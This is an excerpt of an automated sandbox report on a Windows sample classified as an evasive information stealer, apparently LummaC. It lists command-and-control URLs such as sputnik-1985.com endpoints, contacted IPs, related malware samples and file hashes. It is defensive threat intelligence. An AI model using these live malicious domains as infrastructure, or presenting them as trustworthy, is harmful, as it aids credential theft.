                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://steamcommunity.com/workshop/filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://support.mozilla.org/products/firefoxgro.allfilename.exe, 00000000.00000003.1435043330.00000000034F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://store.steampowered.com/legal/filename.exe, 00000000.00000003.1395609830.0000000000924000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=enfilename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icofilename.exe, 00000000.00000003.1406975397.0000000003075000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&afilename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=englfilename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://sputnik-1985.com/apiSfilename.exe, 00000000.00000003.1468834713.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1459281538.00000000009B7000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000002.1532336714.00000000009BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                		unknown
                                                                                                                                                                                http://upx.sf.netAmcache.hve.4.drfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://store.steampowered.com/filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://sputnik-1985.com//filename.exe, 00000000.00000003.1458208599.000000000097B000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1468927237.000000000097B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.pngfilename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgfilename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://sputnik-1985.com/apiffilename.exe, 00000000.00000003.1459281538.00000000009B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://bashfulacid.lat/pic1filename.exe, 00000000.00000002.1532096286.0000000000916000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.giffilename.exe, 00000000.00000003.1395609830.0000000000924000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://ac.ecosia.org/autocomplete?q=filename.exe, 00000000.00000003.1406975397.0000000003075000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://sputnik-1985.com/apipfilename.exe, 00000000.00000003.1468864624.0000000003011000.00000004.00000800.00020000.00000000.sdmp, filename.exe, 00000000.00000002.1532779820.0000000003014000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=VsdTzPa1YF_Y&l=efilename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://sputnik-1985.com/apilfilename.exe, 00000000.00000003.1458208599.000000000097B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQfilename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://sputnik-1985.com/2Lfilename.exe, 00000000.00000002.1532096286.000000000097C000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1434347762.000000000097B000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1446925420.000000000097B000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395750412.000000000097C000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1458208599.000000000097B000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1468927237.000000000097B000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1433413919.000000000097B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?filename.exe, 00000000.00000003.1433939021.000000000304E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&ampfilename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://sputnik-1985.com/apixOfilename.exe, 00000000.00000003.1395750412.000000000097C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    http://store.steampowered.com/account/cookiepreferences/filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=enfilename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://store.steampowered.com/mobilefilename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://steamcommunity.com/filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high

                                                                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                                                                            Public IPs

                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                            104.21.48.1
                                                                                                                                                                                                            		sputnik-1985.comUnited States
                                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                            104.102.49.254
                                                                                                                                                                                                            		steamcommunity.comUnited States
                                                                                                                                                                                                            		16625AKAMAI-ASUSfalse

                                                                                                                                                                                                            General Information

                                                                                                                                                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                            Analysis ID:1587439
                                                                                                                                                                                                            Start date and time:2025-01-10 11:35:09 +01:00
                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                            Overall analysis duration:0h 5m 42s
                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                            Number of analysed new started processes analysed:10
                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                            Sample name:filename.exe
                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@2/5@13/2
                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                            • Successful, ratio: 98%
                                                                                                                                                                                                            • Number of executed functions: 45
                                                                                                                                                                                                            • Number of non-executed functions: 200
                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                            • Found application associated with file extension: .exe

                                                                                                                                                                                                            Warnings

                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 20.189.173.21, 13.107.246.45, 20.190.159.64, 20.109.210.53, 20.3.187.198, 20.12.23.50
                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): www.bing.com, watson.events.data.microsoft.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollectorcommon.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                            Simulations

                                                                                                                                                                                                            Behavior and APIs

                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                            05:36:09API Interceptor9x Sleep call for process: filename.exe modified
                                                                                                                                                                                                            05:36:24API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                                                            IPs

                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            104.21.48.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                                                                                                            • twirpx.org/administrator/index.php
                                                                                                                                                                                                            SN500, SN150 Spec.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                            • www.antipromil.site/7ykh/
                                                                                                                                                                                                            104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                            • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                                                                                                            http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • www.valvesoftware.com/legal.htm

                                                                                                                                                                                                            Domains

                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            s-part-0017.t-0009.t-msedge.nethttps://form.fillout.com/t/emEtLm993dusGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                                            Invoice_R6GPN23V_TransactionSuccess.html.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                                            https://email.analystratings.net/ls/click?upn=u001.WeKo-2BCuHku2kJmVIsYmGxteRO-2BqdkFdZns7E8OZ0trgZRhaAY0f4dRd5bGXo8w1-2B5SPZj6mt6bkINmYNA1f4blf-2F2qp6pSrdQgqdtKPVZlFfsGiBd9L9S-2BVNmfUTaZ-2Bp0zWbjdQ23pm6OHkVsvPYDi1myQ0pU4BHbfSebmhjQAIDDVMgAvG7Znw7Pr8RLFA8HEKUDF6j4JiiZ3slfATgGRu3-2BdlWbffHNdZW8UBc7QW6Nxd08b90zhz6-2FhInZrSp1J-2Fh9yU6gsolKI10c6pp1uA-2FrYRI2h9aMn65O5NvFrP-2Fc-2BjlCyvznYBIXNfkBGEguSmRbREbgogGbx0CjJc9kfZpcF-2F4T3W7floa7RxJ5-2BKjbFDYD7FnGxTCmOAt-2BDLn5J0y5KvJMT3qFWKyQo5DJ5ru0B7ksJyMiI6L18xz5XP2GRtxbC7dwfszL4xopys7uMk6wzOFXTrTU9jYi2ZvQxqCtOzUddy1WGVe8msfQF8x3k3Ejw4p6mGzrKR8wOZXnO3uVw5n8j0tNkc31-2F1y7FsWAGygTmAHNV4DJiUXG3-2Foq61jCXRLG1PMMCZ97ToDeMjE9XjfX-2Bb4NXrzqR3tgw-3D-3DwyWG_tUVFAbhJxF44ufbifaYzyYApcQooCC4WsuZoiwe419Oh5WFVYobMs1ROnIPWGGcLQ6-2Bsxhj60Ehn0XDEyVD6MCEZ1gioYU2lwgwkCuP2dHRX-2FYdZnQ31dEdwKW37GtXYj9HmZ1F0YrZWwSELmaO5K7noqwYAhu2QGcGqOtQYdjShoJMVTWOe6BTzZXQxib8Y6rd4SX-2BUwZMt-2BbgPIpal6PcS8i4PCSiFy8RF-2Ftt22Wpj713n23BIU6an4375YDP3Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                                            https://email.analystratings.net/ls/click?upn=u001.WeKo-2BCuHku2kJmVIsYmGxteRO-2BqdkFdZns7E8OZ0trgZRhaAY0f4dRd5bGXo8w1-2B5SPZj6mt6bkINmYNA1f4blf-2F2qp6pSrdQgqdtKPVZlFfsGiBd9L9S-2BVNmfUTaZ-2BpuOeo6wXhYyQnN5Dmhl9EwD4jJy2QucAxD5PJ8TFaAtq5-2Fa2JLywFyD22uAsFmhYjQLp65IuicFXReMolU22hvgQ-2B1S2bacC3gnzhuRxI8SAkOsPFFxOcYEiSSZTqVyp3m1OxPmLRrTi1o5-2FZom3YCyV1EUto77Rrvablg0dLCkGGW0ncnt-2B7IgK6LBBZRD7ITvGmpDjZtTYsz0I1qKiLzZdNfmubxarfJC5-2BcEqOw-2Ft-2FbdrugnVMUWHAHioUxjwvqr4QWKZSVt-2BeoNRvP2Adsk-2FRWXyTy-2FNsOG5tm8W5iiSHTNAe6b2ve-2F-2FMif4OPRLC2jk2zIHDBodMQqimJe7S-2B0c0a6VcurrTf-2BSSIJw1siTQylKaBjy96o6v7aWNACMPOJmDH5ybp8Hfg60OUEGx1ZLebRMpxX9k9AP7u40PlQ7YN0etELZUsiTbXY4PcX2P96RfnnTH8k4gdprbyM68BwIDNXqkSpWupXgXawXvLifC6eFYgMzHs5EFbgb5u6HEHo2__tUVFAbhJxF44ufbifaYzyYApcQooCC4WsuZoiwe419Oh5WFVYobMs1ROnIPWGGcL7zwYzcSR3guHWoKhXDu5EQ7SXJZpci4hCmpp1REa7W1YXEAS6JqnE9LrlFK998LZ271LMIRubQetxBOsHxh3FfsHQej0U45DqU0JnGYKUA9waD6Ny-2BL9vchurlVMDvBupSQHaqHAKs87lmzkMbvNLGI-2BMPx7o1UJrTBuhk-2BVx-2FdFVsZL4Uf2HUcBJTS73hyiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                                            https://email.analystratings.net/ls/click?upn=u001.WeKo-2BCuHku2kJmVIsYmGxteRO-2BqdkFdZns7E8OZ0trgZRhaAY0f4dRd5bGXo8w1-2B5SPZj6mt6bkINmYNA1f4blf-2F2qp6pSrdQgqdtKPVZlFfsGiBd9L9S-2BVNmfUTaZ-2Bp0zWbjdQ23pm6OHkVsvPYDi1myQ0pU4BHbfSebmhjQAIDDVMgAvG7Znw7Pr8RLFA8HEKUDF6j4JiiZ3slfATgGRu3-2BdlWbffHNdZW8UBc7QW6Nxd08b90zhz6-2FhInZrSp1J-2Fh9yU6gsolKI10c6pp1uA-2FrYRI2h9aMn65O5NvFrP-2Fc-2BjlCyvznYBIXNfkBGEguSmRbREbgogGbx0CjJc9kfZpcF-2F4T3W7floa7RxJ5-2BKjbFDYD7FnGxTCmOAt-2BDLn5J0y5KvJMT3qFWKyQo5DJ5ru0B7ksJyMiI6L18xz5XP2GRtxbC7dwfszL4xopys7uMk6wzOFXTrTU9jYi2ZvQxqCtOzUddy1WGVe8msfQF8x3k3Ejw4p6mGzrKR8wOZXnO3uVw5n8j0tNkc31-2F1y7FsWAGygTmAHNV4DJiUXG3-2Foq61jCXRLG1PMMCZ97ToDeMjE9XjfX-2Bb4NXrzqR3tgw-3D-3DrgFz_tUVFAbhJxF44ufbifaYzyYApcQooCC4WsuZoiwe419Oh5WFVYobMs1ROnIPWGGcLui8UPBZcrEcBQ64UpH2s9-2FDpSu9qfcgYFRQKTYsD5OOP7p7kgdevUOf60UO0BtzRorOOVdIMlEbf0g38VGeCmtkP8At2J-2BxKEtoZ2O48KqLdUMGUmxH4Esb-2BPRc25uZJoq4Qo0YWw9j31285luIdhLwnz-2B9RfofSABy36tB5aPmDcVeLn5C5N5AJkqjfepa6Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                                            https://email.analystratings.net/ls/click?upn=u001.WeKo-2BCuHku2kJmVIsYmGxteRO-2BqdkFdZns7E8OZ0trgBe3vvPhUi3NCctiT7ICCnQ-2FY8o5rhg4URlGJ-2FvsNaBLrMZH2YOUKWM-2BCE-2FXqUBn4SuSDNO43ZHONlcfV0u69WPaY48i3uh3m8lqIzkUcMcKGiml1g6PtP2N9Fq73ADmecSkBDQ1wDesGGu-2Bg3LC1PY31AnFBjTo5itfBoUzfV1y-2FNuV7ub4JBfgFfFwbfDCVw04z2QHPGmvaTuYBRiOw1Tpn5jhya1bpe-2FZKFIvw6DpoIa015fiQnAkr21qCIGDz3kcWaHiPPoAcEbgrIJQtXRwdHoKOAHjnLbHeTfYxioE2jQ-2BKzgO6L-2FLiLt79tmJXX2KYx8D6DTv7nI91sFKT8dXMJM0DazaslrneD4lIUneNyaGARqqUVvrSB7-2BzgxAL-2FuXFyd1qjf-2FnnaV5h661BgCBEWKyZBkPjSGhvc635VlrPtfR5g3T0pDVRqQ8o-2Fg4-3DfYwI_tUVFAbhJxF44ufbifaYzyYApcQooCC4WsuZoiwe419PER4av1iPHZIu7rMCH4g59O-2FpVm-2BPXLGfx0fQIDbM830SEyalx7CL7LS5G2wzbNPhsJ2FagkVeT-2FvL4PXhjlJE5YFKw59He2Ja9QVSEHwhUEJm-2BBDxFee6A4QFWAIxMlxI8kis-2B4bFFLDszJAKx313jD-2F4FRd82vUXuacU2lSKZ4Ah2gmv6sbaeoxYrNwq4bbw0e0DJ7EzH1nxfqSXJpTzGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                                            http://api.myuhchvision.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                                            PrefetchParser.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                                            http://loginmicrosoftonline.Ssc.qnkproductions.com/cache/css/Ssc/mwoods@ssc.nsw.gov.auGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                                            https://199.188.109.181Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                                            sputnik-1985.comanti-malware-setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                            • 104.21.80.1
                                                                                                                                                                                                            [UPD]Intel_Unit.2.1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.21.64.1
                                                                                                                                                                                                            Installer.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                                                                                                                                            • 104.21.96.1
                                                                                                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.21.80.1
                                                                                                                                                                                                            BnJxmraqlk.exeGet hashmaliciousLummaC, PrivateLoaderBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Babadeda, LummaC Stealer, Poverty Stealer, PureLog StealerBrowse
                                                                                                                                                                                                            • 104.21.96.1
                                                                                                                                                                                                            NjFiIQNSid.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.21.112.1
                                                                                                                                                                                                            steamcommunity.com1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            SensorExpo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            anti-malware-setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            cache_registerer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            Invoice.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            NvOxePa.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            h3VYJaQqI9.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            P2V7Mr3DUF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            v3tb7mqP48.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.102.49.254

                                                                                                                                                                                                            ASNs

                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            CLOUDFLARENETUSanti-malware-setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            https://we.tl/t-fnebgmrnYQGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.26.0.90
                                                                                                                                                                                                            appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                            • 104.21.80.1
                                                                                                                                                                                                            Undelivered Messages.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.21.84.200
                                                                                                                                                                                                            driver.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                            • 162.159.137.232
                                                                                                                                                                                                            XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 104.20.4.235
                                                                                                                                                                                                            http://www.efnhdh.blogspot.mk/Get hashmaliciousGRQ ScamBrowse
                                                                                                                                                                                                            • 172.67.12.83
                                                                                                                                                                                                            gem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                            • 104.26.12.205
                                                                                                                                                                                                            http://pdfdrive.com.coGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.21.11.245
                                                                                                                                                                                                            RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                            • 104.21.80.1
                                                                                                                                                                                                            AKAMAI-ASUS1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            SensorExpo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            anti-malware-setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            cache_registerer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 23.209.153.127
                                                                                                                                                                                                            http://postman.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.102.43.106
                                                                                                                                                                                                            https://sanctionssearch.ofac.treas.govGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 23.49.251.37
                                                                                                                                                                                                            Fantazy.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.81.98.224
                                                                                                                                                                                                            Fantazy.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 184.28.181.149

                                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            a0e9f5d64349fb13191bc781f81f42e11.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            SensorExpo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            anti-malware-setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            cache_registerer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            CY SEC AUDIT PLAN 2025.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            PO#3_RKG367.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            Invoice.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            24EPV9vjc5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            kXzODlqJak.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            • 104.102.49.254

                                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                                            No context

                                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_filename.exe_221d82bf9a84558f4a48fa8b9d6583c3a5fd9fb_bbed499e_94272097-7c27-4ea7-bc41-da119727378f\Report.wer

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):1.0270538019831088
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:CZGcZgcPPk0X8TuZiVmju3mhSuiFeH4IO8T4u:YGcZgcPHsaZiVmj/SuiFeH4IO8T4u
                                                                                                                                                                                                            MD5:88B40C9DA6D8678EE98E47512E6F76FA
                                                                                                                                                                                                            SHA1:F23B26F5DB31AC31D6861C736DD6ABD09B2AE474
                                                                                                                                                                                                            SHA-256:48C45DCEB4CE908BE1217A12A32BFEAF027CC7EF6A9A7A899F09AEE6ED559C01
                                                                                                                                                                                                            SHA-512:F4A5CA06FCD86CF5E00CCBA735393426F106EC79F8B9DFB326E41E1C3D74F63AB4A0A1DE95DBCA73C0312264846FD7BA6F6B32AED8B29A5D5C7AC3F79EBACEF2
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:low
